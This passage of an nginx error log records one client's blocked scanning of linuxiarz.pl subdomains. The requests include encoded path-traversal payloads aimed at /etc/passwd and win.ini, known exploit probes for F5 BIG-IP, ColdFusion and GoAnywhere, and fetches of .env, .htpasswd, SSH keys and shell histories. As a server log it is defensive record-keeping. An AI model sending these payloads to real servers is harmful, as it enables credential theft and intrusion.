/.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./windows/win.ini HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/25 00:13:17 [error] 1257#1257: *860612 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2ewindows/win.ini HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/25 00:13:17 [error] 1257#1257: *860614 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows/win.ini HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/25 00:13:18 [error] 1257#1257: *860631 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.%25%2532%2565/.%25%2532%2565/.%25%2532%2565/.%25%2532%2565/.%25%2532%2565/.%25%2532%2565/.%25%2532%2565/windows/win.ini HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/25 00:15:09 [error] 1257#1257: *860726 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.wp-config.php.swp HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/25 00:17:14 [error] 1257#1257: *860883 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.../.../.../.../.../.../.../.../.../windows/win.ini HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/25 00:17:50 [error] 1257#1257: *860909 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /js/../.htpasswd HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/25 00:18:01 [error] 1257#1257: *860917 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.../.../.../.../.../.../.../.../.../etc/passwd HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/25 00:18:25 [error] 1257#1257: *860931 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.s3cfg HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/25 00:18:51 [error] 1257#1257: *860951 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.dockercfg HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/25 00:18:59 [error] 1257#1257: *860959 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.htpasswd HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/25 00:19:40 [error] 1257#1257: *860996 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.docker/config.json HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/25 00:26:17 [error] 1257#1257: *861423 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.config/sftp.json HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/25 00:27:04 [error] 1257#1257: *861470 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.vscode/sftp.json HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/25 00:27:52 [error] 1257#1257: *861546 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/25 00:27:58 [error] 1257#1257: *861551 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.idea/httpRequests/http-requests-log.http HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/25 00:28:47 [error] 1257#1257: *861594 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.idea/httpRequests/http-client.cookies HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/25 00:38:48 [error] 1257#1257: *862150 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.example.com HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/25 21:58:25 [error] 1257#1257: *970079 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.wp-config.php.swp HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/05/25 21:58:25 [error] 1257#1257: *970082 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.listing HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/05/25 21:58:26 [error] 1257#1257: *970084 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.pass HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/05/25 21:58:29 [error] 1257#1257: *970102 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.passwd HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/05/25 21:58:31 [error] 1257#1257: *970107 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.bash_history HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/05/25 21:58:40 [error] 1257#1257: *970153 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.svn HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/05/25 21:58:40 [error] 1257#1257: *970155 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.user.ini HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/05/25 21:58:41 [error] 1257#1257: *970159 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.hg HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/05/25 21:58:41 [error] 1257#1257: *970160 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.ssh/id_rsa HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/05/25 21:58:44 [error] 1257#1257: *970171 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.python-eggs HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/05/25 21:58:44 [error] 1257#1257: *970174 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.DS_Store HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/05/25 21:58:47 [error] 1257#1257: *970181 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.settings HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/05/25 21:58:48 [error] 1257#1257: *970187 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.config.php.swp HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/05/25 21:58:54 [error] 1257#1257: *970221 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.ssh HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/05/25 21:58:55 [error] 1257#1257: *970225 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.cache HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/05/25 21:59:07 [error] 1257#1257: *970275 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.zip HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/05/25 21:59:08 [error] 1257#1257: *970287 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.grunt/ HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/05/25 21:59:19 [error] 1257#1257: *970337 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.idea HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/05/25 21:59:26 [error] 1257#1257: *970373 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.codekit-cache HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/05/25 21:59:27 [error] 1257#1257: *970379 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.inst/ HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/05/25 21:59:28 [error] 1257#1257: *970381 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.komodotools HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/05/25 21:59:28 [error] 1257#1257: *970382 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.komodotools/ HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/05/25 21:59:29 [error] 1257#1257: *970386 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.idea/ HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/05/25 21:59:29 [error] 1257#1257: *970390 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.svn/ HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/05/25 21:59:30 [error] 1257#1257: *970392 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.htpasswd HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/05/25 21:59:33 [error] 1257#1257: *970397 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.local HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/05/25 21:59:36 [error] 1257#1257: *970424 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.mc/ HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/05/25 21:59:36 [error] 1257#1257: *970430 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.cache/ HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/05/25 21:59:45 [error] 1257#1257: *970474 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.mc HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/05/25 21:59:49 [error] 1257#1257: *970488 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.fontconfig/ HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/05/25 21:59:51 [error] 1257#1257: *970498 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.c9/ HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/05/25 22:02:24 [error] 1257#1257: *971241 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.cache HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/05/25 22:02:25 [error] 1257#1257: *971245 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.settings HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/05/25 22:02:27 [error] 1257#1257: *971266 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.ssh/id_rsa HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/05/25 22:02:27 [error] 1257#1257: *971269 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.inst/ HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/05/25 22:02:28 [error] 1257#1257: *971279 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.codekit-cache HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/05/25 22:02:31 [error] 1257#1257: *971301 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.passwd HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/05/25 22:02:32 [error] 1257#1257: *971307 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.python-eggs HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/05/25 22:02:37 [error] 1257#1257: *971361 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.fontconfig/ HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/05/25 22:02:42 [error] 1257#1257: *971407 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.local HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/05/25 22:02:48 [error] 1257#1257: *971459 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.svn/ HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/05/25 22:02:49 [error] 1257#1257: *971469 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.idea HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/05/25 22:02:51 [error] 1257#1257: *971485 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.mc/ HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/05/25 22:02:56 [error] 1257#1257: *971534 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.hg HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/05/25 22:02:59 [error] 1257#1257: *971559 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.config.php.swp HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/05/25 22:03:10 [error] 1257#1257: *971653 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.listing HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/05/25 22:03:12 [error] 1257#1257: *971675 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.wp-config.php.swp HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/05/25 22:03:16 [error] 1257#1257: *971709 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.pass HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/05/25 22:03:18 [error] 1257#1257: *971729 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.komodotools HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/05/25 22:03:21 [error] 1257#1257: *971763 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.svn HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/05/25 22:03:22 [error] 1257#1257: *971772 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.zip HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/05/25 22:03:26 [error] 1257#1257: *971799 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.grunt/ HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/05/25 22:03:27 [error] 1257#1257: *971815 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.komodotools/ HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/05/25 22:03:28 [error] 1257#1257: *971825 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.user.ini HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/05/25 22:03:37 [error] 1257#1257: *971887 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.ssh HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/05/25 22:03:39 [error] 1257#1257: *971901 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.bash_history HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/05/25 22:03:44 [error] 1257#1257: *971951 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.htpasswd HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/05/25 22:03:48 [error] 1257#1257: *971976 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.idea/ HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/05/25 22:03:49 [error] 1257#1257: *971987 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.c9/ HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/05/25 22:03:54 [error] 1257#1257: *972036 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.cache/ HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/05/25 22:03:57 [error] 1257#1257: *972064 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.mc HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/05/25 22:03:58 [error] 1257#1257: *972070 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.DS_Store HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/05/25 22:27:58 [error] 1257#1257: *974241 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.git/HEAD HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/05/25 22:27:58 [error] 1257#1257: *974242 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.svn/wc.db HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/05/25 22:27:58 [error] 1257#1257: *974244 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.gh/store/00manifest.i HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/05/29 12:54:35 [error] 1257#1257: *1319712 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /hax/..CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/05/29 12:55:23 [error] 1257#1257: *1319766 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /npm-pwg/..;/axis2-AWC/services/listServices HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/05/29 12:57:55 [error] 1257#1257: *1319948 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/05/29 12:58:53 [error] 1257#1257: *1319996 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.DS_Store HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/05/29 12:58:59 [error] 1257#1257: *1320008 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.bash_history HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/05/29 12:59:01 [error] 1257#1257: *1320013 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /openam/oauth2/..;/ccversion/Version HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/05/29 12:59:37 [error] 1257#1257: *1320032 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /hex/..CFIDE/wizards/common/utils.cfc?method=wizardHash&inPassword=foo&_cfclient=true&returnFormat=wddx HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/05/29 12:59:53 [error] 1257#1257: *1320054 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.ksh_history HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/05/29 13:00:35 [error] 1257#1257: *1320094 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.sh_history HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/05/29 13:00:58 [error] 1257#1257: *1320111 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.zsh_history HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/05/29 13:08:14 [error] 1257#1257: *1320527 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /hax/..CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/05/29 13:09:49 [error] 1257#1257: *1320617 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /npm-pwg/..;/axis2-AWC/services/listServices HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/05/29 13:13:22 [error] 1257#1257: *1320984 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.DS_Store HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/05/29 13:13:31 [error] 1257#1257: *1320989 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.bash_history HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/05/29 13:15:24 [error] 1257#1257: *1321128 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.ksh_history HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/05/29 13:17:01 [error] 1257#1257: *1321294 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /hex/..CFIDE/wizards/common/utils.cfc?method=wizardHash&inPassword=foo&_cfclient=true&returnFormat=wddx HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/05/29 13:17:10 [error] 1257#1257: *1321302 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.sh_history HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/05/29 13:18:18 [error] 1257#1257: *1321388 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /openam/oauth2/..;/ccversion/Version HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/05/29 13:18:58 [error] 1257#1257: *1321435 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.zsh_history HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/05/29 13:20:04 [error] 1257#1257: *1321488 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/05/29 13:23:15 [error] 1257#1257: *1321868 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/05/29 13:25:20 [error] 1257#1257: *1322086 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/f5-release HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/05/29 13:27:25 [error] 1257#1257: *1322319 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/05/29 13:27:52 [error] 1257#1257: *1322344 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /php/ztp_gate.php/.js.map HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/05/29 13:29:06 [error] 1257#1257: *1322473 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /ui/..%5Csrc%5CgetSettings.rsb?@json HTTP/1.1", host: "kodi.linuxiarz.pl", referrer: "https://kodi.linuxiarz.pl:443" +2025/05/29 13:33:03 [error] 1257#1257: *1322829 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /npm-pwg/..;/usp/searchUsers.do HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/05/29 13:35:44 [error] 1257#1257: *1323076 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%23foo/development HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/05/29 13:40:01 [error] 1257#1257: *1323526 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /php/ztp_gate.php/.js.map HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/05/29 13:43:57 [error] 1257#1257: *1323838 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /openam/oauth2/..;/ccversion/Version HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/05/29 13:49:00 [error] 1257#1257: *1324238 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /npm-pwg/..;/axis2-AWC/services/listServices HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/05/29 13:52:02 [error] 1257#1257: *1324415 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /api/.env HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/05/29 13:52:24 [error] 1257#1257: *1324482 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/05/29 13:52:24 [error] 1257#1257: *1324483 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.env.bak HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/05/29 13:52:25 [error] 1257#1257: *1324486 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.env.dev HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/05/29 13:52:25 [error] 1257#1257: *1324489 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.env.dev.local HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/05/29 13:52:26 [error] 1257#1257: *1324492 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.env.development.local HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/05/29 13:52:26 [error] 1257#1257: *1324493 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.env.prod HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/05/29 13:52:27 [error] 1257#1257: *1324494 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.env.prod.local HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/05/29 13:52:27 [error] 1257#1257: *1324495 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.env.production HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/05/29 13:52:28 [error] 1257#1257: *1324498 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.env.production.local HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/05/29 13:52:28 [error] 1257#1257: *1324501 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.env.local HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/05/29 13:52:29 [error] 1257#1257: *1324502 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.env.example HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/05/29 13:52:29 [error] 1257#1257: *1324505 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.env.stage HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/05/29 13:52:30 [error] 1257#1257: *1324506 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.env.live HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/05/29 13:52:30 [error] 1257#1257: *1324507 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.env.backup HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/05/29 13:52:31 [error] 1257#1257: *1324508 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.env.save HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/05/29 13:52:31 [error] 1257#1257: *1324509 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.env.old HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/05/29 13:52:32 [error] 1257#1257: *1324514 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.env.www HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/05/29 13:52:32 [error] 1257#1257: *1324515 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.env_1 HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/05/29 13:52:33 [error] 1257#1257: *1324517 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.env_sample HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/05/29 13:52:33 [error] 1257#1257: *1324521 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.env.linuxiarz HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/05/29 13:52:34 [error] 1257#1257: *1324524 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.env.kodi HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/05/29 13:54:19 [error] 1257#1257: *1324687 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.wp-config.php.swp HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/05/29 13:56:05 [error] 1257#1257: *1324819 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /iuap-apcom-workbench/ucf-wh/yonbiplogin/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%2500.png.js HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/05/29 13:58:13 [error] 1257#1257: *1325093 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.htpasswd HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/05/29 13:58:45 [error] 1257#1257: *1325146 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET 